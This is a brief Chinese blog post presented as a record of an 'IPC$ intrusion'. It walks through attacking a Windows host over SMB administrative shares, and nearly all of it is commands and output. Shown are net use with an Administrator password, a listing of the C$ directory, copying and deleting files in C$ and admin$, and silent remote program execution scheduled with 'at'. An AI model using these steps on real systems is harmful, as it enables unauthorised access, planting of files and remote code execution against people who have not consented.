IPC$入侵的流程

網上有很多的IPC$入侵記錄,可以自行參考,這裏只是一次的過程的記錄而已,沒有其他額外的內容。


1.建立非空連接

格式:net use \\IP <password> /u:"<Username>"

net use \\192.168.1.121 1qaz2wsx /u:"Administrator"

在域控下:net use \\IP pwd /u:domain\username

2.列一下目錄

dir \\192.168.1.121\c$
</pre><pre name="code" class="cpp">顯示結果如下:
2015/07/29  12:01    <DIR>          3aaa
2015/06/01  23:23    <DIR>          cXXXX
2015/06/07  23:16    <DIR>          CloudMusic
2015/03/31  17:19    <DIR>          Exam
2009/07/14  11:20    <DIR>          PerfLogs
2015/05/16  10:23    <DIR>          Program Files
2015/07/29  13:06    <DIR>          Program Files (x86)
2015/03/21  15:09    <DIR>          Ramble
2015/03/21  18:43    <DIR>          Task
2015/07/28  11:49                58 testlog.txt
2015/08/09  09:46    <DIR>          Users
2015/08/06  15:38    <DIR>          Windows
2015/05/24  00:42    <DIR>          ADF
               1 個文件             58 字節
              12 個目錄  7,865,815,040 可用字節



3.查看遠程機器的時間

net time \\192.168.1.121


4.拷貝文件到遠程機器

copy 123.txt \\192.168.1.121\C$


copy 123.txt \\192.168.1.121\admin$

//admin$所指路徑爲C:\Windows\system32


5.刪除目標文件
del \\192.168.1.121\admin$\123.txt

6.執行某個程序(無交互)

at \\192.168.1.121 10:36 \\192.168.1.121\C$\mspaint.exe                         //即在後臺運行,不會顯示出來


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章